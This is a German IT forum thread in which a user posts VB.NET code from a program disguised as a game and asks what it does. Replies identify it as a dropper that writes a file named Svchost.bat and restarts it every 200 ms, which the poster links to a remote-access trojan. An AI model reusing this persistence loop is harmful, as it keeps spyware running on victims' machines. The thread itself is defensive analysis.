Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Programm Code was bedeutet diese batch?

Frage Entwicklung

Mitglied: 93875

93875 (Level 1)

24.09.2010 um 22:13 Uhr, 5014 Aufrufe, 3 Kommentare

Was bedeutet der Text?
Vermute ein bisschen selbstgebastelte Maleware ?
So ein Horst hat mir das als "Spiel für die Mittagspause geschickt" getarnt
und der Spaten meint das es überhaupt nicht auffällt wenn plötzlich eine
Datei unter
C:\Users\Username\appData\Roaming\
mit dem Namen Svchost.bat fragt ausgeführt zu werden


Option Strict On

Imports System.Windows.Forms
Imports System
Imports System.Diagnostics.Process
Public Class Main
Public Shared Sub Main()
Dim sPfad As String = "$install$"
Dim sprozess As String = "Svchost.bat"
Dim DateiBytes() As Byte
DateiBytes = My.Computer.FileSystem.ReadAllBytes(sPfad)
While True
Dim FindeProzess As Boolean = False
For Each p As System.Diagnostics.Process In System.Diagnostics.Process.GetProcessesByName(sprozess)
Try
If p.MainModule.FileName.EndsWith("Svchost.bat") Then
FindeProzess = True
Exit For
End If
Catch ex As Exception
FindeProzess = False
End Try
Next
If FindeProzess = False Then
If My.Computer.FileSystem.FileExists(sPfad) = False Then
Try
My.Computer.FileSystem.WriteAllBytes(sPfad, DateiBytes, False)
System.Diagnostics.Process.Start(sPfad)
Catch ex As Exception
End Try
Else
Try
System.Diagnostics.Process.Start(sPfad)
Catch ex As Exception
End Try
End If
End If
System.Threading.Thread.Sleep(200)
End While
End Sub
End Class
Mitglied: dog
25.09.2010 um 01:15 Uhr
Alles was der Code macht ist eine Datei svchost.bat auf den Rechner zu kopieren und zu überwachen, dass die immer ausgeführt wird.

Was das mit einem Spiel zu tun hat: Nichts.
Bitte warten ..
Mitglied: bastla
25.09.2010 um 10:14 Uhr
... wobei übrigens die eigentlich Fragestellung noch nicht beantwortet werden kann, da bisher nur ein VB-Code gepostet wurde - was in der "svchost.bat" steht, ist daraus natürlich nicht ersichtlich ...

Grüße
bastla
Bitte warten ..
Mitglied: 93875
27.09.2010 um 11:45 Uhr
Also ich habs rausgefunden.

Als spiel getarte Datei die halt diese getarnte svchost ins c kopiert.
Wenn ich jetzt auf ausführen gehe dann kann der Typ meinen PC überwachen und alles mögliche Umstellen.

Er hat mir das Prog geschickt des ist ein Virus oder was auch immer der irgendwas mit "..... Rat" heist.
Ist also erledigt

Rausgeredet hat der typ sich mit ausversehen da er ja "seine freundin die evtl. fremdgeht überwachen" kann.

(Fand ich ziemlich lächerlich)


Danke für die Hilfe.
Bitte warten ..
Ähnliche Inhalte
Batch & Shell
Wenn Prozess läuft kann Batch den Code nicht weiterverarbeiten?
gelöst Frage von spookypoofBatch & Shell11 Kommentare

Hallo, Ich hab ein Problem. Ich hab z.B. zwei verschiedene Menü's und im zweiten Menü starte ich eine Datei. ...

Microsoft Office
Was genau bedeutet
Frage von ImTrainingMicrosoft Office2 Kommentare

Guten Morgen, Weiß einer was diese Fehlermeldung zu bedeuten hat? Sie taucht in einem Programm namens Nova Nota auf ...

Entwicklung
Was bedeutet persistent?
Frage von Heinz0815Entwicklung4 Kommentare

Hi, Was versteht man unter persistent? Z.b. Aufgezeichnete Daten dürfen nicht persistent sein. Grüße Heini

Switche und Hubs
Was genau bedeutet Port Mirroring?
gelöst Frage von windelterroristSwitche und Hubs7 Kommentare

Morgen Ich hab da so ne Frage an euch :) Ich sollte bei einem NETGEAR ProSafe 8 Port Gigabit ...

Neue Wissensbeiträge
Windows 10

Autsch: Microsoft bündelt Windows 10 mit unsicherer Passwort-Manager-App

Tipp von kgborn vor 1 TagWindows 107 Kommentare

Unter Microsofts Windows 10 haben Endbenutzer keine Kontrolle mehr, was Microsoft an Apps auf dem Betriebssystem installiert (die Windows ...

Sicherheits-Tools

Achtung: Sicherheitslücke im FortiClient VPN-Client

Tipp von kgborn vor 1 TagSicherheits-Tools

Ich weiß nicht, wie häufig die NextGeneration Endpoint Protection-Lösung von Fortinet in deutschen Unternehmen eingesetzt wird. An dieser Stelle ...

Internet

USA: Die FCC schaff die Netzneutralität ab

Information von Frank vor 2 TagenInternet5 Kommentare

Jetzt beschädigt US-Präsident Donald Trump auch noch das Internet. Der neu eingesetzte FCC-Chef Ajit Pai ist bekannter Gegner einer ...

DSL, VDSL

ALL-BM200VDSL2V - Neues VDSL-Modem mit Vectoring von Allnet

Information von Lochkartenstanzer vor 2 TagenDSL, VDSL2 Kommentare

Moin, Falls jemand eine Alternative zu dem draytek sucht: Gruß lks

Heiß diskutierte Inhalte
Batch & Shell
Kann man mit einer .txt Datei eine .bat Datei öffnen?
Frage von HelloWorldBatch & Shell18 Kommentare

Wie schon im Titel beschrieben würde ich gerne durch einfaches klicken auf eine Text oder Word Datei eine Batch ...

Router & Routing
OpenWRT bzw. L.E.D.E auf Buffalo WZR-HP-AG300H - update
gelöst Frage von EpigeneseRouter & Routing11 Kommentare

Guten Tag, ich habe auf einem Buffalo WZR-HP-AG300H die alternative Firmware vom L.E.D.E Projekt geflasht. Ich bin es von ...

Windows Server
Ping auf einen bestimmten Server nicht möglich
gelöst Frage von a.thierWindows Server7 Kommentare

Hallo, ich habe folgendes Problem. srv-dc1: Ping srv-nav > geht Ping srv-exchange > geht nicht srv-exchange: Ping srv-dc1 > ...

Windows 10
Autsch: Microsoft bündelt Windows 10 mit unsicherer Passwort-Manager-App
Tipp von kgbornWindows 107 Kommentare

Unter Microsofts Windows 10 haben Endbenutzer keine Kontrolle mehr, was Microsoft an Apps auf dem Betriebssystem installiert (die Windows ...